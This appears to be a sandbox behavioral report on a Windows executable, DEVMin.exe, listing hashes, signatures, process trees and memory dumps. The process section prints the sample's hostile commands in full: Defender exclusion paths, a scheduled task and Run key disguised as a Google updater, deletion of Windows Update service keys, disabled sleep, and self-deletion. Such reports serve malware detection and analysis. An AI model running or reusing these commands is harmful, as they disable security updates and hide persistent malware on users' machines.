Analysis
-
max time kernel
31s -
max time network
34s -
platform
windows7_x64 -
resource
win7-20230621-en -
resource tags
arch:x64arch:x86image:win7-20230621-enlocale:en-usos:windows7-x64system -
submitted
30-06-2023 12:25
Static task
static1
Behavioral task
behavioral1
Sample
DEVMin.exe
Resource
win7-20230621-en
Behavioral task
behavioral2
Sample
DEVMin.exe
Resource
win10v2004-20230621-en
General
-
Target
DEVMin.exe
-
Size
3.6MB
-
MD5
279c66b28f19a510ad6c0f155871fac3
-
SHA1
427bcf049de4b9a848593463e0f36265baa6164c
-
SHA256
ae0b0d973a8b3feff1fb7570e09fadf473b904b8bb53c7eb83da63a53c103164
-
SHA512
f9ae2f0753e689f78ced7d1dbc4273fe17ca1eda2f62ee7a317a4a3614d91fcae62d7aacb8ea1a826f7e0a5a3c5723dc48830483af8e38497bc9593bd2f7f161
-
SSDEEP
98304:JHmeIFVx0/o2Jrd9o2oNiN0KL5Zm2kVehky:DIFVxQJM2eRZfQhky
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security reg.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
Processes:
DEVMin.exedescription pid process target process PID 1992 created 1304 1992 DEVMin.exe Explorer.EXE PID 1992 created 1304 1992 DEVMin.exe Explorer.EXE PID 1992 created 1304 1992 DEVMin.exe Explorer.EXE PID 1992 created 1304 1992 DEVMin.exe Explorer.EXE PID 1992 created 1304 1992 DEVMin.exe Explorer.EXE -
Drops file in Drivers directory 1 IoCs
Processes:
DEVMin.exedescription ioc process File created C:\Windows\System32\drivers\etc\hosts DEVMin.exe -
Stops running service(s) 3 TTPs
-
Deletes itself 1 IoCs
Processes:
cmd.exepid process 1744 cmd.exe -
Drops file in System32 directory 2 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exepid process 1440 sc.exe 1500 sc.exe 1540 sc.exe 892 sc.exe 1624 sc.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
DEVMin.exepowershell.exepowershell.exepid process 1992 DEVMin.exe 1992 DEVMin.exe 2024 powershell.exe 1992 DEVMin.exe 1992 DEVMin.exe 1992 DEVMin.exe 1992 DEVMin.exe 1992 DEVMin.exe 1992 DEVMin.exe 268 powershell.exe 1992 DEVMin.exe 1992 DEVMin.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
powershell.exepowercfg.exepowercfg.exepowercfg.exepowershell.exepowercfg.exedescription pid process Token: SeDebugPrivilege 2024 powershell.exe Token: SeShutdownPrivilege 1224 powercfg.exe Token: SeShutdownPrivilege 272 powercfg.exe Token: SeShutdownPrivilege 1324 powercfg.exe Token: SeDebugPrivilege 268 powershell.exe Token: SeShutdownPrivilege 1864 powercfg.exe -
Suspicious use of WriteProcessMemory 48 IoCs
Processes:
cmd.execmd.exepowershell.execmd.exedescription pid process target process PID 656 wrote to memory of 1224 656 cmd.exe powercfg.exe PID 656 wrote to memory of 1224 656 cmd.exe powercfg.exe PID 656 wrote to memory of 1224 656 cmd.exe powercfg.exe PID 732 wrote to memory of 1440 732 cmd.exe sc.exe PID 732 wrote to memory of 1440 732 cmd.exe sc.exe PID 732 wrote to memory of 1440 732 cmd.exe sc.exe PID 732 wrote to memory of 1500 732 cmd.exe sc.exe PID 732 wrote to memory of 1500 732 cmd.exe sc.exe PID 732 wrote to memory of 1500 732 cmd.exe sc.exe PID 656 wrote to memory of 272 656 cmd.exe powercfg.exe PID 656 wrote to memory of 272 656 cmd.exe powercfg.exe PID 656 wrote to memory of 272 656 cmd.exe powercfg.exe PID 656 wrote to memory of 1324 656 cmd.exe powercfg.exe PID 656 wrote to memory of 1324 656 cmd.exe powercfg.exe PID 656 wrote to memory of 1324 656 cmd.exe powercfg.exe PID 656 wrote to memory of 1864 656 cmd.exe powercfg.exe PID 656 wrote to memory of 1864 656 cmd.exe powercfg.exe PID 656 wrote to memory of 1864 656 cmd.exe powercfg.exe PID 732 wrote to memory of 1540 732 cmd.exe sc.exe PID 732 wrote to memory of 1540 732 cmd.exe sc.exe PID 732 wrote to memory of 1540 732 cmd.exe sc.exe PID 732 wrote to memory of 1624 732 cmd.exe sc.exe PID 732 wrote to memory of 1624 732 cmd.exe sc.exe PID 732 wrote to memory of 1624 732 cmd.exe sc.exe PID 732 wrote to memory of 892 732 cmd.exe sc.exe PID 732 wrote to memory of 892 732 cmd.exe sc.exe PID 732 wrote to memory of 892 732 cmd.exe sc.exe PID 732 wrote to memory of 1488 732 cmd.exe reg.exe PID 732 wrote to memory of 1488 732 cmd.exe reg.exe PID 732 wrote to memory of 1488 732 cmd.exe reg.exe PID 732 wrote to memory of 612 732 cmd.exe reg.exe PID 732 wrote to memory of 612 732 cmd.exe reg.exe PID 732 wrote to memory of 612 732 cmd.exe reg.exe PID 732 wrote to memory of 1120 732 cmd.exe reg.exe PID 732 wrote to memory of 1120 732 cmd.exe reg.exe PID 732 wrote to memory of 1120 732 cmd.exe reg.exe PID 732 wrote to memory of 1400 732 cmd.exe reg.exe PID 732 wrote to memory of 1400 732 cmd.exe reg.exe PID 732 wrote to memory of 1400 732 cmd.exe reg.exe PID 732 wrote to memory of 1048 732 cmd.exe reg.exe PID 732 wrote to memory of 1048 732 cmd.exe reg.exe PID 732 wrote to memory of 1048 732 cmd.exe reg.exe PID 268 wrote to memory of 1620 268 powershell.exe schtasks.exe PID 268 wrote to memory of 1620 268 powershell.exe schtasks.exe PID 268 wrote to memory of 1620 268 powershell.exe schtasks.exe PID 1744 wrote to memory of 764 1744 cmd.exe choice.exe PID 1744 wrote to memory of 764 1744 cmd.exe choice.exe PID 1744 wrote to memory of 764 1744 cmd.exe choice.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\DEVMin.exe"C:\Users\Admin\AppData\Local\Temp\DEVMin.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#owhqpc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTaskMachineQC /tr 'C:\Users\Admin\Google\Chrome\updater.exe'3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\DEVMin.exe"2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\choice.exechoice /C Y /N /D Y /T 33⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\36K3VUO6VH7E1ET55NXF.tempFilesize
7KB
MD522d22870a64e87573a1b2e314e2e73b8
SHA167ab118a231f9c0fb13eaf56d226cb76f38c34c8
SHA256b6e360925220e35dee78de967b7458d5527bdce875230e89d0a8addf438937ff
SHA512690cadc2bbe6337ce9801d1fa4df2bf710fb4a2f5d097470b50d3799ca21a3fb031ab5887984886a8d3c9df45dd88e72ad5c4a7d755cd8c49b8b7897a49db4ea
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD522d22870a64e87573a1b2e314e2e73b8
SHA167ab118a231f9c0fb13eaf56d226cb76f38c34c8
SHA256b6e360925220e35dee78de967b7458d5527bdce875230e89d0a8addf438937ff
SHA512690cadc2bbe6337ce9801d1fa4df2bf710fb4a2f5d097470b50d3799ca21a3fb031ab5887984886a8d3c9df45dd88e72ad5c4a7d755cd8c49b8b7897a49db4ea
-
memory/268-71-0x0000000002660000-0x00000000026E0000-memory.dmpFilesize
512KB
-
memory/268-68-0x000000001B100000-0x000000001B3E2000-memory.dmpFilesize
2.9MB
-
memory/268-69-0x0000000002250000-0x0000000002258000-memory.dmpFilesize
32KB
-
memory/268-72-0x0000000002660000-0x00000000026E0000-memory.dmpFilesize
512KB
-
memory/268-70-0x0000000002660000-0x00000000026E0000-memory.dmpFilesize
512KB
-
memory/268-73-0x0000000002660000-0x00000000026E0000-memory.dmpFilesize
512KB
-
memory/1992-75-0x000000013F220000-0x000000013F5BA000-memory.dmpFilesize
3.6MB
-
memory/2024-61-0x00000000024EB000-0x0000000002522000-memory.dmpFilesize
220KB
-
memory/2024-60-0x00000000024E4000-0x00000000024E7000-memory.dmpFilesize
12KB
-
memory/2024-59-0x00000000022D0000-0x00000000022D8000-memory.dmpFilesize
32KB
-
memory/2024-58-0x000000001B190000-0x000000001B472000-memory.dmpFilesize
2.9MB